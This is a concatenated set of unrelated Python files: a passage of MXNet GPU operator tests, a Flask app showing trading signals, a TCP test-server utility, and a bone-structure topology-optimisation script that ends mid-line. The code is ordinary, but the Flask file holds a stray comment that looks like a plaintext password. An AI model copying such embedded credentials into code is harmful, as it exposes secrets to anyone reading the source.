check_rnn_consistency(fused, stack) check_rnn_consistency(stack, fused) @with_seed(1234) def test_psroipooling_with_type(): arg_params = { 'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # plain psroipooling sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool') ctx_list = [{'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}}, ] check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write', 'psroipool_rois': 'null'}, arg_params=arg_params) @with_seed(1234) def test_deformable_psroipooling_with_type(): arg_params = { 'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # deformable psroipooling sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3, output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool') ctx_list = [{'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64, 'deformable_psroipool_trans': np.float64}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32, 'deformable_psroipool_trans': np.float32}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16, 'deformable_psroipool_trans': np.float16}}, ] check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write', 'deformable_psroipool_rois': 'null', 'deformable_psroipool_trans': 'write'}, arg_params=arg_params) @with_seed(1234) def test_deformable_convolution_with_type(): sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv') # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, # {'ctx': mx.gpu(0), # 'deformable_conv_data': (2, 2, 10, 10), # 'deformable_conv_offset': (2, 18, 8, 8), # 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}}, ] # wider tolerance needed for true-fp16 NCHW test above tol = {np.dtype(np.float16): 0.5, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write', 'deformable_conv_offset': 'write', 'deformable_conv_weight': 'write', 'deformable_conv_bias': 'null'}, tol=tol) @with_seed() def test_deformable_convolution_options(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3} # 2D convolution # Pad > 0 # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, tol=tol) # Stride > 1 # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, tol=tol) # Dilate > 1 # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, tol=tol) # Deformable group > 1 # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, # {'ctx': mx.gpu(0), # 'deformable_conv_data': (2, 2, 7, 7), # 'deformable_conv_offset': (2, 36, 5, 5), # 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv') @with_seed() @assert_raises_cudnn_disabled() def test_residual_fused(): cell = mx.rnn.ResidualCell( mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm', prefix='rnn_', dropout=0.5)) inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)] outputs, _ = cell.unroll(2, inputs, merge_outputs=None) assert sorted(cell.params._params.keys()) == \ ['rnn_parameters'] args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50)) assert outs == [(10, 2, 50)] outputs = outputs.eval(ctx=mx.gpu(0), rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5, rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5, rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0))) expected_outputs = np.ones((10, 2, 50))+5 assert np.array_equal(outputs[0].asnumpy(), expected_outputs) def check_rnn_layer(layer): layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)]) with mx.gpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) go, gs = layer(x, states) with mx.cpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) co, cs = layer(x, states) # atol of 1e-6 required, as exposed by seed 2124685726 assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6) def check_rnn_layer_w_rand_inputs(layer): layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)]) x = mx.nd.uniform(shape=(10, 16, 30)) with mx.gpu(0): x = x.copyto(mx.gpu(0)) states = layer.begin_state(16) go, gs = layer(x, states) with mx.cpu(0): x = x.copyto(mx.cpu(0)) states = layer.begin_state(16) co, cs = layer(x, states) assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6) @with_seed() def test_sequence_reverse(): check_sequence_reverse(mx.gpu(0)) @with_seed() def test_autograd_save_memory(): x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0)) x.attach_grad() with mx.autograd.record(): for i in range(200): x = x + 1 x.wait_to_read() x.backward() @with_seed() def test_cuda_rtc(): source = r''' extern "C" __global__ void axpy(const float *x, float *y, float alpha) { int i = threadIdx.x + blockIdx.x * blockDim.x; y[i] += alpha * x[i]; } extern "C" __global__ void saxpy(const float *x, float *y, float alpha) { extern __shared__ float smem[]; int i = threadIdx.x + blockIdx.x * blockDim.x; smem[threadIdx.x] = x[i]; y[i] += alpha * smem[threadIdx.x]; } ''' module = mx.rtc.CudaModule(source) axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha") x = mx.nd.ones((10,), ctx=mx.gpu(0)) y = mx.nd.zeros((10,), ctx=mx.gpu(0)) axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1)) assert (y.asnumpy() == 3).all() saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha") saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10) assert (y.asnumpy() == 7).all() saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5) assert (y.asnumpy() == 12).all() @with_seed() def test_cross_device_autograd(): x = mx.nd.random.uniform(shape=(10,)) x.attach_grad() with mx.autograd.record(): y = mx.nd.tanh(x) y = y.copyto(mx.gpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.cpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.gpu(0)) y = y.copyto(mx.gpu(0)) y.backward() dx = x.grad.asnumpy() x.grad[:] = 0 with mx.autograd.record(): y = x for i in range(3): y = mx.nd.tanh(y) y.backward() assert_almost_equal(dx, x.grad.asnumpy()) @with_seed() def test_multi_proposal_op(): # paramters feature_stride = 16 scales = (8, 16, 32) ratios = (0.5, 1, 2) rpn_pre_nms_top_n = 12000 rpn_post_nms_top_n = 2000 rpn_min_size = feature_stride feat_len = (1000 + 15) // 16 H, W = feat_len, feat_len num_anchors = len(scales) * len(ratios) count_anchors = H * W * num_anchors def get_new_data(batch_size, ctx): ''' cls_prob: (batch_size, 2 * num_anchors, H, W) bbox_pred: (batch_size, 4 * num_anchors, H, W) im_info: (batch_size, 3) ''' dtype = np.float32 cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx) bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx) im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx) cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)] np.random.shuffle(cls) cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape) bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx) for i in range(batch_size): im_size = np.random.randint(600, feat_len * feature_stride, size = (2,)) im_scale = np.random.randint(80, 100) / 100.0 im_info[i, :] = [im_size[0], im_size[1], im_scale] return cls_prob, bbox_pred, im_info def check_proposal_consistency(op, batch_size, with_nms=False): ''' op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal ''' cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0)) rois_cpu, score_cpu = op( cls_prob = cls_prob, bbox_pred = bbox_pred, im_info = im_info, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = rpn_min_size, output_score = True) gpu_ctx = mx.gpu(0) # copy data to gpu from cpu cls_prob_gpu = cls_prob.as_in_context(gpu_ctx) bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx) im_info_gpu = im_info.as_in_context(gpu_ctx) rois_gpu, score_gpu = op( cls_prob = cls_prob_gpu, bbox_pred = bbox_pred_gpu, im_info = im_info_gpu, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = rpn_min_size, output_score = True) rois_cpu_np = rois_cpu.asnumpy() rois_gpu_np = rois_gpu.asnumpy() score_cpu_np = score_cpu.asnumpy() score_gpu_np = score_gpu.asnumpy() if not with_nms: assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3) assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3) else: # no 100% gurantee with nms assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10) assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40) check_proposal_consistency(mx.nd.contrib.Proposal, 1) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5) check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True) # The following 2 functions launch 0-thread kernels, an error that should be caught and signaled. def kernel_error_check_imperative(): os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine' a = mx.nd.array([1,2,3],ctx=mx.gpu(0)) b = mx.nd.array([],ctx=mx.gpu(0)) c = (a / b).asnumpy() def kernel_error_check_symbolic(): os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine' a = mx.sym.Variable('a') b = mx.sym.Variable('b') c = a / b f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)), 'b':mx.nd.array([],ctx=mx.gpu(0))}) f.forward() g = f.outputs[0].asnumpy() def test_kernel_error_checking(): # Running tests that may throw exceptions out of worker threads will stop CI testing # if not run in a separate process (with its own address space for CUDA compatibility). try: mpctx = mp.get_context('spawn') except: print('SKIP: python%s.%s lacks the required process fork-exec support ... ' % sys.version_info[0:2], file=sys.stderr, end='') else: with discard_stderr(): for f in [kernel_error_check_imperative, kernel_error_check_symbolic]: p = mpctx.Process(target=f) p.start() p.join() assert p.exitcode != 0,\ "Expected a synchronous kernel error from %s(), none seen." % f.__name__ def test_incorrect_gpu(): # Try setting dev_id to a really big number assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001)) @with_seed() def test_batchnorm_backwards_notrain(): for ctx in [mx.cpu(0), mx.gpu(0)]: for cudnn_o in [False, True]: B,C,H,W = 4,3,2,2 x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx) gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx) beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx) mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx) std = mx.nd.random.normal(shape=(C)).as_in_context(ctx) x.attach_grad() with autograd.record(False): y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(), fix_gamma=False, cudnn_off=cudnn_o) loss=y.square().sum() loss.backward(train_mode=False) @with_seed() def test_create_sparse_ndarray_gpu_to_cpu(): dim0 = 10 dim1 = 5 densities = [0, 0.5, 1] for density in densities: shape = rand_shape_2d(dim0, dim1) matrix = rand_ndarray(shape, 'row_sparse', density) data = matrix.data indices = matrix.indices rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu()) assert rsp_created.stype == 'row_sparse' assert same(rsp_created.data.asnumpy(), data.asnumpy()) assert same(rsp_created.indices.asnumpy(), indices.asnumpy()) rsp_copy = mx.nd.array(rsp_created) assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy())) @with_seed() def test_softmax_activation(): gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0)) cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.cpu()) cpu_a.attach_grad() gpu_a.attach_grad() with mx.autograd.record(): gpu_y = mx.nd.SoftmaxActivation(data = gpu_a) cpu_y = mx.nd.SoftmaxActivation(data = cpu_a) assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3) gpu_y.backward() cpu_y.backward() assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(), atol = 1e-3, rtol = 1e-3) def test_context_num_gpus(): # Test that num_gpus reports at least one GPU, as the test is run on a GPU host. assert mx.context.num_gpus() > 0 if __name__ == '__main__': import nose nose.runmodule()
myproject.py
# -*- coding: utf-8 -*- """ Created on Tue Nov 17 17:26:15 2020 @author: mehmet """ import pandas as pd from flask import Flask ,render_template app = Flask(__name__) def buysell(signal): if signal > 0: return "buy" elif signal == 0: return "sell" #### Qwerty12345-., @app.route('/',methods = ['POST' , 'GET']) def index(): df = pd.read_csv("result.csv") #df = df.tail(10) df = df.sort_index(ascending=False) df["lstm_class"] = df["lstm_class"].apply(buysell) df["lstm_predic"] = df["lstm_predic"].apply(buysell) df["lstm_price"] = df["lstm_price"].apply(buysell) df["signal1"] = df["signal1"].apply(buysell) df["signal2"] = df["signal2"].apply(buysell) df["signal3"] = df["signal3"].apply(buysell) e_list = [] for i , r in df.iterrows(): e_list.append([r["lstm_class"],r["lstm_predic"],r["lstm_price"],r["predict_time"] ,r["future_time"],r["time_price"] , r["future_price"], r["signal1"], r["signal2"],r["signal3"] ]) lis = len(e_list) return render_template('index.html' , my_list = e_list , lis = lis) import time def sleep(): print("sleep") time.sleep(5) print("sleep---") #from threading import Thread #import untitled4 #Thread(target=untitled4.precstart).start() if __name__ == "__main__": # http://127.0.0.1:80/ app.run(port=80)
server.py
"""TCP Server module.""" import time import socket import select import threading from testplan.common.utils.timing import wait class Server(object): """ A server that can send and receive messages based on socket interface. Supports multiple connections. :param host: The host address the server is bound to. :type host: ``str`` :param port: The port the server is bound to. :type port: ``str`` or ``int`` :param listen: Socket listen argument. :type listen: ``int`` """ def __init__(self, host="localhost", port=0, listen=1): self._input_host = host self._input_port = port self._listen = listen self._ip = None self._port = None self._listening = False self._server = None self._server_thread = None self._lock = threading.Lock() self._connection_by_fd = {} self._fds = {} self.active_connections = 0 self.accepted_connections = 0 @property def host(self): """Input host provided.""" return self._input_host @property def ip(self): """IP retrieved from socket.""" return self._ip @property def port(self): """Port retrieved after binding.""" return self._port @property def socket(self): """ Returns the underlying ``socket`` object """ return self._server def bind(self): """Bind to a socket.""" self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self._input_port != 0: self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._server.bind((self._input_host, self._input_port)) self._ip, self._port = self._server.getsockname() def serve(self, loop_sleep=0.005, listening_timeout=5): """Start serving connections.""" self._server_thread = threading.Thread( target=self._serving, kwargs=dict(loop_sleep=loop_sleep) ) self._server_thread.daemon = True self._server_thread.start() wait(lambda: self._listening, listening_timeout, raise_on_timeout=True) def _serving(self, loop_sleep=0.005): """Listen for new inbound connections.""" self._server.listen(self._listen) self._listening = True inputs = [self._server] outputs = [] while self._listening: try: readable, writable, exceptional = select.select( inputs, outputs, inputs ) except ValueError: for sock in inputs: # Remove the closed socks. if sock.fileno() == -1: inputs.remove(sock) continue for sock in readable: if sock is self._server: # New connection conn, client_addr = sock.accept() inputs.append(conn) self._connection_by_fd[conn.fileno()] = conn self._fds[self.active_connections] = conn.fileno() self.active_connections += 1 for sock in exceptional: inputs.remove(sock) sock.close() time.sleep(loop_sleep) self._remove_all_connections() try: self._server.shutdown(socket.SHUT_RDWR) except: pass self._server.close() def accept_connection(self, timeout=10, accept_connection_sleep=0.1): """ Accepts a connection in the order in which they were received. Return the index of the connection, which can be used to send and receive messages using that connection. If no connection is already available or becomes available in the given timeout, then the method returns -1. :param timeout: Timeout to wait for receiving connection. :type timeout: ``int`` :param accept_connection_sleep: Sleep time to retry accept connection. :type accept_connection_sleep: ``float`` :return: Index of connection :rtype: ``int`` """ started = time.time() while True: if self.accepted_connections in self._fds: self.accepted_connections += 1 return self.accepted_connections - 1 if time.time() > started + timeout: return -1 time.sleep(accept_connection_sleep) def close_connection(self, conn_idx): """ Unregister, close and remove connection with given connection index :param conn_idx: Connection index of connection to be removed :type conn_idx: ``int`` :return: ``None`` :rtype: ``NoneType`` """ fdesc = self._fds[conn_idx] self._connection_by_fd[fdesc].close() del self._connection_by_fd[fdesc] del self._fds[conn_idx] def receive( self, size=1024, conn_idx=None, timeout=30, wait_full_size=True ): """ Receive a message of given size (number of bytes) from the given connection. :param size: Number of bytes to receive :type size: ``int`` :param conn_idx: Index of connection to receive from :type conn_idx: ``int`` :param timeout: timeout in seconds :type timeout: ``int`` :param wait_full_size: Wait until full size is received. :type wait_full_size: ``bool`` :return: message received :rtype: ``bytes`` """ conn_idx = self._validate_connection_idx(conn_idx) # Get file descriptor and details of connection fdesc = self._fds[conn_idx] connection = self._connection_by_fd[fdesc] connection.settimeout(timeout) if wait_full_size is False: connection.settimeout(0) msg = connection.recv(size) connection.settimeout(timeout) else: with self._lock: msg = b"" try: while len(msg) < size: new_msg = connection.recv(size - len(msg)) if not new_msg: raise Exception("Socket connection broken") msg += new_msg except socket.error: if timeout == 0: raise socket.timeout() raise return msg def send(self, msg, conn_idx=None, timeout=30): """ Send the given message through the given connection. :param msg: message to be sent :type msg: ``bytes`` :param conn_idx: Index of connection to send to :type conn_idx: ``int`` :param timeout: Timeout in seconds for sending all bytes :type timeout: ``int`` :return: Number of bytes sent :rtype: ``int`` """ conn_idx = self._validate_connection_idx(conn_idx) connection = self._connection_by_fd[self._fds[conn_idx]] connection.settimeout(timeout) with self._lock: connection.sendall(msg) return len(msg) def close(self): """Closes the server and listen thread.""" self._listening = False # self._serving may be stuck in select.select if self._server_thread: self._server_thread.join(timeout=0.1) def _validate_connection_idx(self, conn_idx): """ Check if given connection index is valid. If this is None, then the connection defaults to the one and only existing active connection. If there are more active connections or the initial connection is no longer valid this will fail. :param conn_idx: Index of connection to send to :type conn_idx: ``int`` :return: Connection index to send message to :rtype: ``int`` """ if conn_idx is None: if self.accepted_connections > 1: conn_idx = self.accepted_connections - 1 else: conn_idx = 0 if self.accepted_connections == 0: raise Exception("No connection accepted") if conn_idx not in self._fds: raise Exception("Connection {} not active".format(conn_idx)) return conn_idx def _remove_all_connections(self): """ Unregister, close and remove all existing connections :return: ``None`` :rtype: ``NoneType`` """ for fdesc in self._connection_by_fd: self._connection_by_fd[fdesc].close() self._connection_by_fd = {} self._fds = {}
example_topop_tb_v3_2.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Aug 9 02:58:30 2021 @author: qcao v2 - denser structures """ import os import sys sys.path.append('../') # use bonebox from source without having to install/build from bonebox.phantoms.TrabeculaeVoronoi import * from bonebox.FEA.fea import * import numpy as np import matplotlib.pyplot as plt from matplotlib import colors import vtk from pyvistaqt import BackgroundPlotter from skimage.morphology import ball, closing, binary_dilation, binary_closing import pyvista as pv pv.set_plot_theme("document") def generateLDPhantom(Ul, randState, saveNameAppend): #%% Helper functions def volume2mesh(volume, dimXYZ, voxelSize): """ Returns node (in abs coordinates) and elements corresponding to volume. """ nodes, elements = Voxel2HexaMeshIndexCoord(volume) nodes = Index2AbsCoords(nodes, volumeSizeVoxels=dimXYZ, voxelSize=voxelSize) return nodes, elements def extractStresses(feaResult, dimXYZ, voxelSize): """ Runs FEA on nodes and elements. """ # Take absolute stresses arrayVM = feaResult["elementVMstresses"].flatten() arrayXX = np.abs(feaResult["elementStresses"][:,0]) arrayYY = np.abs(feaResult["elementStresses"][:,1]) arrayZZ = np.abs(feaResult["elementStresses"][:,2]) # Convert to indexing coordinates, assign to voxels nodesIndexCoord = Abs2IndexCoords(nodes, dimXYZ, voxelSize=voxelSize, origin=(0,0,0)) volumeVM = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayVM) volumeXX = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayXX) volumeYY = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayYY) volumeZZ = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayZZ) xyz = nodes[elements,:][:,0,:] + 0.5 return xyz, arrayVM, arrayXX, arrayYY, arrayZZ, volumeVM, volumeXX, volumeYY, volumeZZ # Volume update def setVoxelsOne(volume, xyz): volume[tuple(xyz.T)] = 1 return volume def setVoxelsZero(volume, xyz): volume[tuple(xyz.T)] = 0 return volume def setNanToZero(x): x[np.isnan(x)] = 0 return x def stressStrainVolume2StrainEnergyDensity(stress, strain, volume): """ For linear isotropic materials undergoing small strains. stress/strain (Nelements x 6) where for each row components are [xx, yy, zz, xy, yz, xz] Helpful link: http://homepages.engineering.auckland.ac.nz/~pkel015/SolidMechanicsBooks/Part_I/BookSM_Part_I/08_Energy/08_Energy_02_Elastic_Strain_Energy.pdf """ strainEnergyDensity = 0.5 * np.sum(stress[:,:3] * strain[:,:3],axis=1) \ + np.sum(stress[:,3:] * strain[:,3:],axis=1) return strainEnergyDensity def strainEnergyDensity2ProbabilityLinear(strainEnergyDensity, s0, slope, pmin=-1., pmax=1): """ Computes the probability of bone removal/addition given its strain energy, based on lazy model Christen et al. Bone remodelling in humans is load-driven but not lazy stress: np.array of voxel stress values s0 (scalar): stress level corresponding to homeostasis slope (scalar): slope of increasing probability of addition wrt stress pmin, pmax: minimum and maximum probability of voxel removal/addition """ prob = slope * (strainEnergyDensity - s0) return np.clip(prob, -1, 1) def strainEnergy2ProbabilityLazy(strainEnergyDensity, Ul, Uu, Ce): """ Computes probability of bone removal/addition given its strain energy, based on lazy model. Nowak et al. New aspects of the trabecular bone remodeling regulatory model resulting from shape optimization studies. Note that output is not Elastic modulus but a probability of voxel undergoing remodeling. """ prob = np.zeros(strainEnergyDensity.shape) prob[strainEnergyDensity>Uu] = Ce*(strainEnergyDensity - Uu) prob[strainEnergyDensity>Ul] = Ce*(strainEnergyDensity - Ul) return np.clip(prob, -1, 1) def strainEnergy2MaskLazyDiscrete(strainEnergyDensity, Ul, Uu): """ Computes probability of bone removal/addition given its strain energy, based on lazy model. Nowak et al. New aspects of the trabecular bone remodeling regulatory model resulting from shape optimization studies. Note that output is not Elastic modulus but a probability of voxel undergoing remodeling. """ mask = np.zeros(strainEnergyDensity.shape, dtype=int) mask[strainEnergyDensity>Uu] = 1 mask[strainEnergyDensity<Ul] = -1 return mask def sampleProbabilityAddRemove(prob, randState): """ Generates output array with +1 denoting addition, -1 denoting removal, and 0 denoting no change, given probabilities defined in prob. """ # Generate uniform distribution in (-1,1) mask = sampleUniformZeroOne(prob.shape, randState=randState) * 2 - 1 mask[(prob>0)&(mask<prob)] = 1 mask[(prob<0)&(mask>prob)] = -1 mask[(mask!=-1)&(mask!=1)] = 0 return mask def volumeVoxelGrowRemove(volume, xyz, mask): """ Add (8-neighborhood) voxels in a volume according to mask Remove Parameters ---------- volume : Integer array of 0 and 1's Initial Volume. xyz : tuple of 3 arrays tuple denoting coordinates cooresponding to mask mask : Voxels to add (+1) and voxel to remove (-1) Returns ------- volume. """ # Neighborhood (6-connected 3D ball) # nbh = ball(1) nbh = np.ones((3,3,3)) # Convert voxel coordinates to volume (TODO: not needed, refactor later) dvolume = np.zeros(volume.shape, dtype=int) dvolume[xyz] = mask # Assign voxels to be added volumeAdd = (dvolume==1) volumeAdd = binary_dilation(volumeAdd,nbh) volume[volumeAdd==1] = 1 # Assign voxels to be removed volumeRemove = (dvolume==-1) volume[volumeRemove==1] = 0 return volume #%% #% Make base structure # Parameters for generating phantom mesh Sxyz, Nxyz = (5,5,7.5), (6,6,9) # volume extent in XYZ (mm), number of seeds along XYZ Rxyz = 0.25 dilationRadius = 3 # (voxels) randState = randState # for repeatability # 1, 2, 3 morphClosingMask = np.ones((3,3,3)) # mask for morphological closing # Parameters for generating phantom volume volumeSizeVoxelsInitial = (100,100,150) voxelSize = np.array(Sxyz) / np.array(volumeSizeVoxelsInitial) # FEA parameters plattenThicknessVoxels = 2 # voxels elasticModulus = 17e9 poissonRatio = 0.3 forceTotal = 1. # Generate faces and edges points = makeSeedPointsCartesian(Sxyz, Nxyz) ppoints = perturbSeedPointsCartesianUniformXYZ(points, Rxyz, randState=randState) vor, ind = applyVoronoi(ppoints, Sxyz) uniqueEdges, uniqueFaces = findUniqueEdgesAndFaces(vor, ind) # Compute edge cosines edgeVertices = getEdgeVertices(vor.vertices, uniqueEdges) edgeCosines = computeEdgeCosine(edgeVertices, direction = (0,0,1)) # Compute face properties faceVertices = getFaceVertices(vor.vertices, uniqueFaces) faceAreas = computeFaceAreas(faceVertices) faceCentroids = computeFaceCentroids(faceVertices) faceNormas = computeFaceNormals(faceVertices) # Make edge volume uniqueFacesRetain = 